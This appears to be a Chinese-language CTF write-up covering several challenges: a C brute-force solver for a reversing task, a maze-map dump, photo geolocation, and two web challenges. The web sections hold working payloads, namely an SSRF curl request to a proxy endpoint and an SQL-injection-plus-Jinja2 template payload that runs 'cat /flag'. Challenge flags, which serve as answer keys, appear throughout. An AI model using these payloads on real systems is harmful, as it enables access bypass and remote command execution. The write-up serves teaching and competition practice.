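0xf9, 0xc5, 0x8, 0x9e, 0x95, 0x2b, 0xe4, 0x20, 0xd1, 0xfd, 0x7c, 0x2f, 0xbe, 0xb9, 0xdb, 0xde, 0xe7, 0xd9, 0x3b, 0xeb, 0xff, 0xb7, 0xca, 0xb4, 0x5, 0xc0, 0xab, 0xcf, 0xed, 0x6c, 0x8d, 0x59};
    int j;
    unsigned char v7 = 0, v8 = 0, temp = 0, temp2 = 0, temp3 = 0;
    unsigned char v12, v3;
    /* was cast to (char *) before: the buffer is used as unsigned bytes throughout */
    unsigned char *v14 = (unsigned char *)malloc(256);
    if (v14 == NULL) {
        return NULL;
    }
    /* encryption rounds, one output byte per input byte */
    for (j = 0; j < 22; j++) {
        /* input-independent S-box evolution */
        v12 = SBox[++v7];
        v8 += v12;
        SBox[v7] = SBox[v8];
        SBox[v8] = v12;
        /* byte scrambling chain (rotates + xor constants), kept exactly as reversed */
        v3 = (( ((((input[j + 5] << 7) | (input[j + 5] >> 1)) << 6) ^ 0x0FFFFFFC0) | ((((input[j + 5] << 7) | (input[j + 5] >> 1)) & 0xff) >> 2) ^ 0x3B) ^ 0x0FFFFFFBE);
        temp = (((v3 << 5) | (v3 >> 3)) ^ 0xFFFFFFAD) & 0xff;
        temp2 = (((temp << 4) | (temp >> 4)) ^ 0x0FFFFFFDE) & 0xff;
        temp3 = ((temp2 << 3) | (temp2 >> 5));
        v14[j] = SBox[(SBox[v7] + v12) & 0xff] ^ deadbeef[j & 3] ^ temp3;
    }
    /* final whitening with the caller-chosen key byte */
    for (j = 0; j < 22; j++) {
        v14[j] ^= xor;
    }
    return (char *)v14;
}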
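/*
 * Recover the flag body by brute force, one byte at a time.
 *
 * `result` holds the expected output of enc() for the real flag.  Before
 * comparing, bytes 7/11 and 12/16 are swapped back, which appears to undo the
 * post-round swap that is left commented out at the end of enc().  enc()'s
 * second argument is presumably the byte XORed over the output (enc() ends
 * with `v14[i] ^= xor`), so every value 0..255 of it is tried and one
 * candidate line is printed per value.
 *
 * Because enc() derives output byte j from input byte j+5 alone (the S-box
 * shuffle it performs per round does not depend on the input), each of the
 * 22 unknown positions can be searched independently: the first byte value
 * whose ciphertext byte matches is printed immediately, or '?' if none does.
 *
 * Returns 0 on success, 1 if the input buffer cannot be allocated.
 */
int main() {
    unsigned char *input = malloc(30);
    if (input == NULL) {
        fputs("malloc failed\n", stderr);
        return 1;
    }
    /* Known framing; positions 5..26 are the unknown body enc() reads. */
    memcpy(input, "flag{AAAAAAAAAAAAAAAAAAAAA}", 27);
    unsigned char result[30] = {0xC4, 0xEE, 0x3C, 0xBB, 0xE7, 0xFD, 0x67, 0x1D, 0xF8, 0x97, 0x68, 0x9D, 0x0B, 0x7F, 0xC7, 0x80, 0xDF, 0xF9, 0x4B, 0xA0, 0x46, 0x91};
    unsigned char temp;

    /* Undo the output permutation: 7 <-> 11 and 12 <-> 16. */
    temp = result[7];
    result[7] = result[11];
    result[11] = temp;
    temp = result[12];
    result[12] = result[16];
    result[16] = temp;

    for (int k = 0; k < 256; k++) {
        for (int i = 0; i < 22; i++) {
            int j = 0;
            for (; j < 256; j++) {
                input[5 + i] = (unsigned char)j;
                unsigned char *encrypted = enc(input, k);
                int match = result[i] == encrypted[i];
                /* enc() hands back a malloc'd 256-byte buffer; the original
                 * leaked one per candidate (~1.4M allocations). */
                free(encrypted);
                if (match) {
                    printf("%c", j);
                    break;
                }
            }
            if (j == 256) {
                printf("?");
            }
        }
        printf("\n");
    }
    free(input);
    return 0;
}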
flag{QeMu_r3v3rs3in9_h@ck6}
Proxy
这道题的 v1 路由有权限限制,只能由本地地址 127.0.0.1 访问;而 `/v2/api/proxy` 路由可以代理访问 `/v1/api/flag` 的内容,于是构造一个请求,让服务端从外部环境代理到 127.0.0.1 上的 v1 路由,从而绕过 IP 限制获取 flag。payload如下:curl -X POST http://101.200.33.255:36881/v2/api/proxy \
-H "Content-Type: application/json" \
-d '{
"url": "http://127.0.0.1:8769/v1/api/flag",
"method": "POST",
"body": "",
"headers": {
"Authorization": ""
},
"follow_redirects": true
}'
回显:{"flag":"ZmxhZ3tmNzZlYTNlYi0yMDI3LTRhM2YtYjRjNS04YWNiNTI4ZjIzNjZ9"}
echo 'ZmxhZ3tmNzZlYTNlYi0yMDI3LTRhM2YtYjRjNS04YWNiNTI4ZjIzNjZ9' | base64 --decode
输出flag:flag{f76ea3eb-2027-4a3f-b4c5-8acb528f2366}
snake
页面是个贪吃蛇游戏,但蛇会自动一直向右走;分析网络数据包后可以编写自动跑的逻辑,代码如下:
```python
import requests
import time
# Move endpoint of the snake game server.
url = "http://eci-2zeg4gjm1ccoteb8ca5w.cloudeci1.ichunqiu.com:5000/move"

# Request headers; the session cookie identifies the player on the server.
headers = {
    "Content-Type": "application/json",
    "Cookie": "session=eyJ1c2VybmFtZSI6IjQzMjQyMzQyIn0.ZyZMsw.ZbZdzoOX_WSIYSfG-J7GDhcbx44",
}

# Route every request through the local intercepting proxy for inspection.
_PROXY_ADDR = "http://127.0.0.1:8082"
proxies = {scheme: _PROXY_ADDR for scheme in ("http", "https")}

# Board dimensions -- adjust to the real game size.
width, height = 20, 20

# The snake starts out heading right.
current_direction = "RIGHT"
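# Unit step for each direction name; UP decrements y, DOWN increments it.
_DIRECTION_DELTAS = {
    "UP": (0, -1),
    "DOWN": (0, 1),
    "LEFT": (-1, 0),
    "RIGHT": (1, 0),
}


def get_next_position(head, direction):
    """Return the cell reached by moving one step from ``head``.

    Args:
        head: ``[x, y]`` coordinate of the snake's head.
        direction: one of ``"UP"``, ``"DOWN"``, ``"LEFT"``, ``"RIGHT"``.

    Returns:
        A new ``[x, y]`` list.  It is deliberately a list rather than a
        tuple so that membership tests against the server's list-of-lists
        snake body compare equal.

    Raises:
        ValueError: if ``direction`` is not one of the four known names.
            The previous version silently returned ``None`` here, which
            only failed later inside the bounds check.
    """
    try:
        dx, dy = _DIRECTION_DELTAS[direction]
    except KeyError:
        raise ValueError(f"unknown direction: {direction!r}") from None
    return [head[0] + dx, head[1] + dy]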
# A move is safe when it stays on the board and does not hit the body.
def is_safe_position(position, snake):
    """Return True if ``position`` is on the board and not part of ``snake``.

    ``snake`` is the list of ``[x, y]`` body cells reported by the server.
    ``position`` is compared by value, so it has to be a list too (a tuple
    never compares equal to a list).
    """
    if position in snake:
        return False
    return is_within_bounds(position)
# True when `position` lies on the board.
def is_within_bounds(position):
    """Return whether ``position`` (``[x, y]``) lies inside the board.

    Uses the module-level ``width`` and ``height``: valid x is
    ``0..width-1`` and valid y is ``0..height-1``.
    """
    x, y = position
    if not 0 <= x < width:
        return False
    return 0 <= y < height
# Pick the next move from the head and food coordinates.
def get_next_direction(snake, food):
    """Return the direction to send next, greedy towards ``food``.

    Directions are ranked by the head-to-food offset (x first, then y) and
    the first one whose target cell is safe wins.  When every candidate is
    blocked, the module-level ``current_direction`` is returned unchanged.

    Args:
        snake: list of ``[x, y]`` cells, head first.
        food: ``[x, y]`` cell of the food.
    """
    head = snake[0]
    head_x, head_y = head
    food_x, food_y = food

    if head_x < food_x:
        preference = ["RIGHT", "UP", "DOWN", "LEFT"]
    elif head_x > food_x:
        preference = ["LEFT", "UP", "DOWN", "RIGHT"]
    elif head_y < food_y:
        preference = ["DOWN", "LEFT", "RIGHT", "UP"]
    elif head_y > food_y:
        preference = ["UP", "LEFT", "RIGHT", "DOWN"]
    else:
        # Head already on the food cell: fall back to the default order.
        preference = ["UP", "DOWN", "LEFT", "RIGHT"]

    for candidate in preference:
        if is_safe_position(get_next_position(head, candidate), snake):
            return candidate
    return current_direction
# Game loop: keep POSTing the current direction and steer from each reply.
while True:
    data = {"direction": current_direction}
    response = requests.post(url, json=data, headers=headers, proxies=proxies)

    if response.status_code != 200:
        print("请求失败,状态码:", response.status_code)
        print(response)
        break

    game_data = response.json()
    status = game_data.get("status")
    if status == "win":
        print("游戏胜利!")
        print("跳转到:", game_data.get("url"))
        break
    if status == "game_over":
        print("游戏结束,分数:", game_data.get("score"))
        break

    # Refresh board state from the reply and choose the next move.
    snake = game_data.get("snake")
    food = game_data.get("food")
    score = game_data.get("score")
    if snake:
        current_direction = get_next_direction(snake, food)
        print(f"当前分数:{score},方向:{current_direction}")

    # Throttle requests to roughly the game's refresh rate.
    time.sleep(0.1)
```
代码跑通后会自动跳转到页面 http://eci-2ze816q8joal2bw725c0.cloudeci1.ichunqiu.com:5000/snake_win?username=1 ,测试发现 username 字段存在 SQL 注入,但 sqlmap 没有跑出来
判断后端为 SQLite 数据库,推测后端是用 Python 写的,手工测了几次没有成功
于是考虑 Python Flask 的 Jinja2 模板注入:Jinja2 引擎在渲染 username 参数时,会执行 {{ ... }} 内部的表达式。
使用payload:admin' union select 1,2,"{{lipsum.__globals__.__builtins__.eval('__import__(\'os\').popen(\'cat /flag\').read()')}}
获取到flag:flag{85d874b8-283b-4461-b8f9-f2940615ebd2}
bbox
dump出地图
unsigned int map[5600] =
{
1u,
1u,
1u,
1u,
1u,
...
};
/* Print the 5600-entry map as 14 boards of 20x20 cells, one digit per cell,
 * one row per line, with two newlines after each board. */
for (int board = 0; board < 14; board++) {
    for (int row = 0; row < 20; row++) {
        const unsigned int *cells = map + 400 * board + 20 * row;
        for (int col = 0; col < 20; col++) {
            printf("%d", cells[col]);
        }
        printf("\n");
    }
    printf("\n\n");
}
得到:11111111111111111111
11111111111111111111
11411111111111111111
11030011111111111111
11011011111111111111
00000211111111111111
11101111111111111111
11101111111111111111
01100110001000100010
01000000001000100010
01000000001000111110
01111111111000000010
00000000001000000010
00001111111000111110
00001000001000100010
01111000001000100010
01000000001111100010
01000000000000000010
01000000001111100010
01000000000000000010
00000000000000000000
01111111111111111110
01000000000000000010
01200300040000000010
01000000000000000010
01111111111111101110
01000000000000000010
01000011111000111110
01000010001000100010
01111110001000100010
00000010000000100010
00111110001000111110
00100000001000000010
00100010111000111110
00100030001000100010
00111100001000100010
00400000001000100010
01111111111000100010
01000000000000000010
01000000000000000010
11111111111111111111
14000000000000000001
10111111111111100001
10100000000000100001
10100000000000100001
10103000000000100001
10111011101111100001
10000000000000000001
10111111111111011111
10000000100000000001
10000000000000001001
10000000100000001001
11111111100000001001
10000000000000002001
11111111111111111111
00000000000000000000
00000000000000000000
00000000000000000000
00000000000000000000
00000000000000000000
11111111111111111111
14000000000000000001
10000001111111000001
10000000300001000001
10000001000001000001
10000001000021000001
10000001111111000001
10000000000000000001
11111111111111111111
10000000100000000001
10000000100000000111
10000000100000000100
10111111100000000100
10000000000000000100
11111111111111111111
00000000000000000000
00000000000000000000
00000000000000000000
00000000000000000000
00000000000000000000
11111111111111111111
10000000000000000001
10111111111111111001
10100000000000001001
10101111111111111001
10101000000000001001
10101011111111111001
10101010000000000001
10101010111111111101
10001000100000000001
11111111111111111111
10000000000000100001
10000001111111101101
10000001000000001001
11111111111111111111
10000000000000040001
10000001111111110101
10000000000000300001
11111011111111101111
10000000000000020001
11111111111111111111
14000003000000000001
10111111111111100001
10100000002000000001
10101111111111101101
10101000001000001001
10101011111011101001
10001010001010001001
10111010101010101101
10100000000000000001
11111111111111101111
10000001000000000001
10000001111111011101
10000001000000301001
11111111400000001001
10000000000000001001
10111111111111111001
10100000000000000001
11111111111111111111
10000000000000000001
11111111111111111111
10000010000000000001
10111111111111111001
10100000000000001001
10101111111111111001
10101000021000000001
10101011111011111101
10101010000010000001
10001010111110111101
11111010100000100001
10000010101111101101
10111110101000001001
10100000101011111001
10101111101010000001
10003000000000111111
11111011111010100001
10000000000010101111
10111111111110001001
14000000000000001001
11111111111111111111
11111111111111111111
14000000000002003001
10111011111111111001
10100000000000000001
10101111111011111001
10101400001000001001
10101011111010101001
10101010001010101001
10101010111010101101
10003000100000000001
10111011111111111101
10000001000010000001
11111111111111111101
10003000000000041001
10111111111111111001
10100000001000000001
10101111111011111101
10101000001000001001
10101011111111111001
10000000000000000001
11111111111111111111
10000000000000100001
10111111111111111001
10100000000000001001
10101111111111111001
10101000000000000001
10101110111011111101
10001013001010001001
11111002111010101001
10000010100000101001
10111114101111111001
10100000001000000001
10101111101111111101
10101000000000001001
10001111111111111001
11111000000000000001
10000011111111111101
10111110000000000001
10100000000000000001
11111111111111111111
11111111111111111111
11111111111111111111
11111111111111111111
11100000000001111111
11101111111101111111
11101111111101111111
11101111111101111111
11101111111101111111
11101111111101111111
11100000000001111111
11111111111101111111
11111111111101111111
11111111111101111111
11111111111101111111
11111111111101111111
11111111111101111111
11111111111101111111
11111111111111111111
11111111111111111111
11111111111111111111
11111111111111111111
11111111111111111111
11111111111111111111
11111111111111111111
11011110111101111111
11011110111101111111
11011110111101111111
11011110111101111111
11011110111101111111
11101110111011111111
11101110111011111111
11101101010111111111
11110101010111111111
11110101010111111111
11111011101111111111
11111111111111111111
11111111111111111111
11111111111111111111
11111111111111111111
11111111111111111111
11111111111111111111
11111111111111111111
11111111111111111111
11101111111111111111
11101111111111111111
11101111111111111111
11101111111111111111
11101111111111111111
11100000000011111111
11101111111011111111
11101111111011111111
11101111111011111111
11101111111011111111
11101111111011111111
11101111111011111111
11100000000011111111
11111111111111111111
11111111111111111111
11111111111111111111
11111111111111111111
11111111111111111111
11111111111111111111
11111110000011111111
11111110111011111111
11111110111011111111
11111110111011111111
11111110111011111111
11111110111011111111
11111110111011111111
11111110111011111111
11111110111011111111
11111110000011111111
11111111111111111111
11111111111111111111
11111111000111111111
11111111010111111111
11111111010111111111
11111111000111111111
11111111111111111111
11111111111111111111
00000000000000000000
00000000000000000000
00000000000000000000
00000000000000000000
00000000000000000000
00000000000000000000
00000000000000000000
00000000000000000000
00000000000000000000
00000000000000000000
00000000000000000000
00000000000000000000
00000000000000000000
00000000000000000000
00000000000000000000
00000000000000000000
00000000000000000000
00000000000000000000
00000000000000000000
00000000000000000000
手动推出每张图的最短路:
2
12
13
9
21
13
25
31
3
还有四个字符来自后四张地图,拼出来是 qwb!
结合最后的提示,那么得到flag:
flag{qwb!_fec2d316d20dbacbe0cdff8fb6ff07b9}
Master of OSINT
第二张图,可以看到百安居的招牌,到百度地图搜索百安居可以发现是百安居龙阳店和百安居商务大楼,利用百度地图拾取坐标系统可以得到坐标 121.566729,31.210738
第三张图,通过抖音识图可以知道最右边为双流机场塔台,可以知道为成都双流国际机场,沿着十号线在二号航站楼附近可以找到这个路口,得到地址103.966693,30.571169
第四张图,卡车上写着浙通物流,上网搜索发现有杭州浙通物流有限公司,猜测图片位于杭州,继续搜索杭州带有大环形的高速,搜出来绕城高速,然后在沿线挨个查看有弧形与直线交叉的直线道路,可以找到乔莫西路辅路上的绕城高速附近的住宅区与图片中一样,可得到大概坐标120.294086,30.346038
第五张图,搜索护栏为蓝白相间的地区可以得到地点为重庆,可以看到图片中是在建设,根据外形判断是商城,上网搜索重庆在建的商城,得到万象城二期附近与图片中相似,得到大概坐标106.524087,29.525444
第六张,看到远处有古塔,搜索各大城市古塔,根据形状高度与周边环境判断出为南京大报恩寺琉璃塔,再根据与塔的大致距离判断出大致坐标118.78403,32.013174
第七张,通过抖音识图得知左边为通往湖南师范大学的一栋高楼,通过图片可以判断这在一条河的桥上,根据已知可以得知这是橘子洲大桥,并且在桥上得到图片场景,得到大致坐标112.967877,28.20171
第八张,可以判断为跨河大桥上且河边有风力发电,再根据抖音识图加搜索,排除筛选后为上海长江大桥,沿桥筛选得到大致坐标121.735075,31.413123
第九张,判断为跨河大桥,首先想到武汉长江大桥,提交不正确重新筛选,搜索国内的跨江大桥,且根据江的颜色判断为长江,武汉居多,从武汉开始尝试,发现武汉天兴洲长江大桥正确,大致坐标114.412917,30.660256
第十张,在最左边可以模糊看到宏泰百货四个大字,百度搜索发现在杭州,在杭州市内放大筛选,百度地图搜索宏泰百货并在附近寻找有大量高架路地段,南秀路附近符合,得到大致坐标120.307975,30.154753